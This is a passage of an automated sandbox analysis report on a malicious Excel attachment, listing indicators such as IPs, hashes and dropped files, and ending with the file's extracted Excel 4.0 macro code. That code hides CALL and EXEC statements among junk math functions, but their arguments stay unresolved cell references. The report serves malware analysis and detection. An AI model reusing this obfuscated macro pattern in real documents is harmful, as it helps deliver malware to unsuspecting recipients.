                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wildcard.weather.microsoft.com.edgekey.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    103.212.121.53upload_dreport_1364433.xlsGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      WEBWERKS-AS-INWebWerksIndiaPvtLtdINupload_dreport_1364433.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.53
                                                                                                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                                                                                                      • 43.241.61.180
                                                                                                                                                      FIR_Copy.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.224.241.225
                                                                                                                                                      Copy of Invoice 522967.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 43.239.110.5
                                                                                                                                                      Enquiries & PO.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.102.234.200
                                                                                                                                                      Purchase_Order.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.102.234.200
                                                                                                                                                      z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                                                                                                      • 150.242.140.16
                                                                                                                                                      Tomd.htmGet hashmaliciousBrowse
                                                                                                                                                      • 103.102.234.241
                                                                                                                                                      SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.102.234.241
                                                                                                                                                      Swift copy.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.224.241.225
                                                                                                                                                      PO71109.EXEGet hashmaliciousBrowse
                                                                                                                                                      • 103.102.234.253
                                                                                                                                                      creoagent.dllGet hashmaliciousBrowse
                                                                                                                                                      • 103.233.25.209
                                                                                                                                                      creoagent.dllGet hashmaliciousBrowse
                                                                                                                                                      • 103.233.25.209
                                                                                                                                                      printouts of outstanding as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 103.11.153.223
                                                                                                                                                      payment infirmation.exeGet hashmaliciousBrowse
                                                                                                                                                      • 206.183.111.188
                                                                                                                                                      User Credentials.docGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.59
                                                                                                                                                      E-Statement.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.190
                                                                                                                                                      CV_SrinivasaBabuAdhikari.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.190
                                                                                                                                                      STS CARGO SHIPMENT.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.190
                                                                                                                                                      HSBC Payment Advice.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.212.121.190

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\31A18EA3-F8E4-459A-9527-8B83DF194053
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):133170
                                                                                                                                                      Entropy (8bit):5.371004285314851
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:1cQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:tVQ9DQW+zTXiJ
                                                                                                                                                      MD5:5925CAC375BF23316AD8D7B310E2F5A2
                                                                                                                                                      SHA1:2354D73E03F22CA1942B6419DD9EE18773CE2DF2
                                                                                                                                                      SHA-256:CC8B0EAC505E1DA32366FBD5E35F282EAD6C1F74505A7E1D8C320E6A73BF4374
                                                                                                                                                      SHA-512:F9EF02606327B8A8C16F9C4BEE503128810AA6D6E1A4DCF03B69AC39C117258DF491EB2393401ABE230747D8A8ACC31DC8766C0140FE0D01EDCF987EC894F4D3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-08T16:37:10">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\B5B10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80323
                                                                                                                                                      Entropy (8bit):7.888869260496569
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:MyPZ8pqrWGHVYPAeWRlMVGoIahaDHTU6hryF70Ki1:tPZJrW2VWg2sTU2yF70Ki1
                                                                                                                                                      MD5:12B90C89AB4CEECD70403208DFBB2250
                                                                                                                                                      SHA1:F30D512FCA19689461A5DA0E37058F70AA0FCCFD
                                                                                                                                                      SHA-256:40778B03F2C320EBBA0B5314F9C2ED73D00649CD4DDDEEB88AD554FB6F6CCEC7
                                                                                                                                                      SHA-512:43810810E625CB74BA8AE1A4F7B4DDD2EC09E580C3EC182B4586C96D917766C7A2BFFF6C2D74E586C8D859EC037FE453D5EEBAD1AC6AC53313B678FEAC22DDD1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .UKO.0..W.?D........,..G.T...=.X.<....co......<<..3.O.g.5..D.......J.e.~.^..Y.I8%.w.5 ;[.}...`Eh.-.S.?8G......"..V$z.K..\.%.......%p.N..-...{....7N.[..|./K.L...|....D.u.Lc".|..!.-E.z...^.R.y4.,{....).7.r.e...F.Oj@........-....qu....M.]Z.a.`...Rc....;....=9.T......./.\........Z.`. T!.....=>...v...6...../r..)..r_..\....\..g..SNLk....t.r/"._)...t....PQ<f.||8..#..]:s7..........h.]."..4lg....*.,;.....5...Of........PK..........!................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Fri Apr 9 00:37:14 2021, atime=Fri Apr 9 00:37:14 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):909
                                                                                                                                                      Entropy (8bit):4.7055110936446
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8fxsJRUx0H6CHiDWEdfDGXn9DW0M+W+jA0/y1bDyvLkeGLkeM4t2Y+xIBjKZm:8fxyW1WSShW0rA0KJDyF7aB6m
                                                                                                                                                      MD5:9F5BC6A89F89967A058133F6CD9C2D1D
                                                                                                                                                      SHA1:AB37C4A44ABC2C76DF2DD9EC76C296A8558CBC2B
                                                                                                                                                      SHA-256:A5C843954C1EE852D2EFFA711C809C61895A6D90022D41A1B826E2A844B5CBD2
                                                                                                                                                      SHA-512:B6CF6C924D6ED48ADCF24326609AB0AD2CC95EAF34D88DE066338802987C390858E6111CFB234BE81EF5A6D833B1DDBED7AD6298392337B8C40DE95321881F60
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F............-...b..,...P`..,... ......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1......R....Desktop.h.......NM..R.......Y..............>.....@...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......675052...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):119
                                                                                                                                                      Entropy (8bit):4.657212536980188
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomMIlPdwbIVtlPdwbmMIlPdwbv:dj6OPdV3PdWOPdm
                                                                                                                                                      MD5:5BCEAE4B11BAD38798C24B8CFF42C07D
                                                                                                                                                      SHA1:CDDDD3F63123E108951D9F3134E4BC6C842319AB
                                                                                                                                                      SHA-256:1FBB4753F83F300753566EF8AA2A0BD7F11B6351DB6CA28FEA3A108D5CD142AF
                                                                                                                                                      SHA-512:671E76DF026E712FB8BCD2F6FF29FB15C907B25FB9E35648A9EE2ECB72F41B6230901DC86BE317E960E11C5FE950177000B8904C2168183EB6857334B147FD09
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..upload_dreport_1364433.LNK=0..upload_dreport_1364433.LNK=0..[xls]..upload_dreport_1364433.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\upload_dreport_1364433.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:07 2020, mtime=Fri Apr 9 00:37:14 2021, atime=Fri Apr 9 00:37:14 2021, length=108032, window=hide
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):2240
                                                                                                                                                      Entropy (8bit):4.722452756988707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:86y1WvYWEkQcsFKnQcGB6p6y1WvYWEkQcsFKnQcGB6:86TZWcFQcGK6TZWcFQcG
                                                                                                                                                      MD5:61FC655F1D6EABD1808A635208C751F7
                                                                                                                                                      SHA1:50C8572DD316AE987A4AB88CF3B0E6BF83B0AC20
                                                                                                                                                      SHA-256:FA03D6E024992116E86081E346B04BEECB1A5A49D65C0B242A94FF23EB8247A5
                                                                                                                                                      SHA-512:F68D84FDB29EF754A6F4E9BC398DF78A34737517112E4D188912460ADB2E7A78002ADCB48EC6505000481071825CD4792213DD826B5DEB7114B7487ED6032F53
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... .......8....P`..,...P`..,...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R.......S........................a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R.......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..J...R.. .UPLOAD~1.XLS..f......>Q.u.R......f......................J&.u.p.l.o.a.d._.d.r.e.p.o.r.t._.1.3.6.4.4.3.3...x.l.s.......a...............-.......`...........>.S......C:\Users\user\Desktop\upload_dreport_1364433.xls..1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.u.p.l.o.a.d._.d.r.e.p.o.r.t._.1.3.6.4.4.3.3...x.l.s.........:..,.LB.)...Aw...`.......X.......675052...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22
                                                                                                                                                      Entropy (8bit):2.9808259362290785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                      MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                      SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                      SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                      SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                      C:\Users\user\Desktop\96B10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):143800
                                                                                                                                                      Entropy (8bit):6.966926244132447
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:wA8rmOAIyyzElBIL6lECbgBGzP5xLm7T02rTUKyF70XirW2qkH13oqkHf33BA8rd:H8rmOAIyyzElBIL6lECbgB+P5Nm7TXUA
                                                                                                                                                      MD5:BBB9C39A51FECB5B84FB7A57C5081DE9
                                                                                                                                                      SHA1:B3A1A67C3839822380C71A0CD5EE8256FA35541D
                                                                                                                                                      SHA-256:417BBC38E43CFE8209E0BE1BDB50FF223C83EC8697C2E793F2CDC79BED1C1BCF
                                                                                                                                                      SHA-512:9A76E948878B9A81ACC2B269C5EBF78518615D214C9FB6CEA246B02333697A0838AD3E2DEBA6EFC6DFF1DE4F213FF6B7F01B96B052B88B3D6EB514CA45EBC0C0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1.......?........e..C.a.l.i.b.r.i.1...@...8........e..C.a.l.i.b.r.i.1...@............e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1.......?........e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1................e..C.a.l.i.b.r.i.1...,...8........e..C.a.l.i.b.r.i.1.......8........e..C.a.l.i.b.r.i.1.......8........e..C.a.l.i.b.r.i.1...h...8........e..C.a.m.b.r.i.a.1.......4........e..C.a.l.i.b.r.i.1...........

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Apr 8 17:19:11 2021, Security: 0
                                                                                                                                                      Entropy (8bit):3.194802926156192
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:upload_dreport_1364433.xls
                                                                                                                                                      File size:281088
                                                                                                                                                      MD5:754118ba489515384b9607af8afb0818
                                                                                                                                                      SHA1:a16a7be15f0d55a3a1e8aa771752d2740cd7b0a6
                                                                                                                                                      SHA256:9a8354e138e9a773581bb74e52e6e1a7dffb3fb0f6ec1859b4a4d7dc62421c97
                                                                                                                                                      SHA512:a6fc3834f997ca328a1e2b85f40bb7a952a608044cba608bd62ce250f035f4d96f81a584a523b90d3ba39f6b5ae671d7b2e92c6b94a5713a1764046b4c75e1ce
                                                                                                                                                      SSDEEP:6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5IZJK+flk99:2n99
                                                                                                                                                      File Content Preview:........................>.......................#................................... ...!..."..................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "upload_dreport_1364433.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Last Saved By:5
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-04-08 16:19:11
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.335261663834
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.248866429231
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . i . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                                                                                                                                      Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 269254
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Book
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                      Stream Size:269254
                                                                                                                                                      Entropy:3.16227621583
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                                                                                                                                                      Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      "=ACOSH(8768687687)=ACOS(887687324345)=ASIN(543873524385)=ACOSH(4538354354)=ACOS(54345354345)=ASIN(54354323215216300000)=ACOSH(4535435483212210000)=ACOS(5.46863453535456E+26)=ASIN(4.21621642164261E+27)=ACOSH(45354354385783400000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=CALL(Docs3!BX32&Docs3!BS25&Docs3!BQ45&Docs3!BQ46,Docs3!BZ32&Docs3!CA33&Docs3!BY34&Docs3!CA35&Docs3!CA36,Docs3!CB32&Docs3!CB33,0,Docs3!BU14,Docs3!BZ22,0,0)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=Docs1!AU22()"
                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=EXEC(Docs3!BW41&Docs3!BW42&Docs3!BW43&Docs3!BW44&Docs3!BZ22&Docs3!BZ41&Docs3!CA41&Docs3!BZ42&Docs3!BZ43)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,
